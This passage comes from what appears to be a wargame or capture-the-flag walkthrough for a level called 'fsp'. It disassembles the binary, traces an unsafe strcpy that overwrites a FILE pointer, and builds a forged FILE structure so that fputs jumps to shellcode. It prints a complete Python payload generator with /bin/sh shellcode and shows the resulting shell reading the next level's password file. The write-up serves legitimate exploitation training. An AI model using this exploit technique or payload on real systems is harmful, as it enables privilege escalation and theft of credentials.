 80484b5: e8 9e fe ff ff        call   8048358 <exit@plt>
 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)
 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)
 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>
 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>
 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>

Now, one thing that should serve to guide us is that there is no return from main, only exit calls. This means that overwriting the return address will be of no use here.
Bearing that in mind, let's first reconstruct the image of the stack while trying to understand what the program does:

 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx

This means ecx points to the first argument of main, which is argc. A few lines later we can see:

 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)

Which means that the address of argc is stored in ebp-0x428.
We then have:

 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>

Which is just a check to verify there is at least one argument to the program, after which there must be a jump to the rest of main, or a usage printout in case of a mismatch.
Whatever happens in the main flow of main is pretty straightforward:

 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)

This opens the file called temp in append mode, and puts the return value (which is fp) in ebp-0x8.
Next piece of code is:

 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)

Which loads the address of argc to edx, then loads the value stored 4 bytes above that address, which is argv, into eax. This makes eax point to &argv[0], adding 4 to eax will make it point to &argv[1], and dereferencing that pointer will make eax itself point to argv[1]. That address is stored in esp+0x4 which makes it a second argument to a function (which is about to be called):

 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>

This loads the first argument with ebp-0x419, which is just some address within the stack which we can call buf, and then calls strcpy. Effectively, argv[1] is copied into buf, and might I also add that it does so in an unsafe fashion.
What it does next is:

 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>

That's loading fp as the second argument, and buf as the first argument, and calling fputs.
After that, the program just exits with 0:

 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>

Just to put it all together, here's a picture of the stack-frame:

Well, the only thing we can overwrite by exploiting the unsafe strcpy are fp and the return address, though seeing that main never returns, but rather exits, we are only left with fp. Let's work with that.
The only thing for which fp is used, after being returned from fopen, is in fputs, so let's see what happens there. Since the executable is not statically compiled, I will use gdb to disassemble fputs (cropped to the interesting parts only):

level6@blackbox:~$ gdb fsp
...
(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run
Starting program: /home/level6/fsp 

Breakpoint 1, 0x08048452 in main ()
(gdb) disassemble fputs
Dump of assembler code for function fputs:
0x001b24a0 <fputs+0>:   push   %ebp
0x001b24a1 <fputs+1>:   mov    %esp,%ebp
0x001b24a3 <fputs+3>:   sub    $0x1c,%esp
0x001b24a6 <fputs+6>:   mov    %ebx,0xfffffff4(%ebp)
0x001b24a9 <fputs+9>:   mov    0x8(%ebp),%eax
0x001b24ac <fputs+12>:  call   0x170d10 <free@plt+112>
0x001b24b1 <fputs+17>:  add    $0xd7b43,%ebx
0x001b24b7 <fputs+23>:  mov    %esi,0xfffffff8(%ebp)
0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi
0x001b24bd <fputs+29>:  mov    %edi,0xfffffffc(%ebp)
0x001b24c0 <fputs+32>:  mov    %eax,(%esp)
0x001b24c3 <fputs+35>:  call   0x1c7e30 <strlen>
0x001b24c8 <fputs+40>:  mov    %eax,0xfffffff0(%ebp)
0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>
...
0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>
0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax
0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)
...

Let's see what happens here. First, inside the function, the first parameter, buf, is at ebp+0x8, and the second, fp, is at ebp+0xc. We don't care about buf, only fp.
So the first thing that happens with fp is:

0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi

This just stores fp in esi, so we have to keep our eyes open to esi references as well. Next:

0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>

This looks familiar from the previous level. It tests for the first long word in the FILE structure pointed by fp to have a certain flag set. If it is set, the program will move in a direction desirable to us:

0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>

This checks that the 0x46th byte into fp is 0x00, and jumps to some location if it is. We do not want it to jump there, so we will make sure there is something non-zero at that address.
The next piece of code is:

0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax

What happens here is that the byte at fp+0x46 is copied into eax with size and sign extend (which means that the rest of eax will be zeroed out). And then that value is used as an index in some list that starts at fp+0x94. The value at that list index is copied to eax.
Let's see what happens next:

0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)

This piece of code sets two function arguments, but we don't care about them, because what it does next is call the function whose address is stored at eax+0x1c.

It should be clear by this time what we need to do:

Whatever we have in the first argument to the program will be copied into buf.
The beginning of the payload should start with 0x80808080 to make sure we pass the flag check.
The 0x46th byte needs to be something different from 0x00, let's just choose it to be 0x01.
The long word at 0x94+0x01=0x95 should contain a pointer. Let's make it point to 0x95+4=0x99 (just one slot after the current one).
At 0x99+0x1c=0xb5 we should have another pointer to 0xb5+4=0xb9.
Then we insert the shellcode.
Then there should be some filler which will complete the payload to 0x411 bytes.
The last 4 bytes will overwrite fp and so they should be the address of the bottom of buf.

Or, better put in a diagram:

All that's left now is to discover ebp so we can fill that structure up. Remember that the payload is 0x411+4=0x415 bytes long:

level6@blackbox:~$ gdb fsp
...

(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run `python -c "print 'a'*0x415"`
Starting program: /home/level6/fsp `python -c "print 'a'*0x415"`

Breakpoint 1, 0x08048452 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd678

And write some script to generate the payload:

level6@blackbox:/tmp$ cd /tmp
level6@blackbox:/tmp$ cat > genpayload.py
import struct
EBP = 0xbfffd678
BUF = EBP - 0x419
PTR1 = BUF + 0x99
PTR2 = BUF + 0xb9
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x80808080)
FILE += '\x90' * (0x46 - 4)
FILE += "\x01"
FILE += '\x90' * (0x95 - 0x47)
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * (0xb5 - 0x99)
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (0x419 - 8 - len(FILE))
FILE += struct.pack("<L", BUF)

print FILE

Let's give it a shot:

level6@blackbox:~$ ~/fsp `python /tmp/genpayload.py`
sh-3.1$ cat /home/level7/password
cat: /home/level7/password: No such file or directory
sh-3.1$ cat /home/level7/passwd
??????????

Done!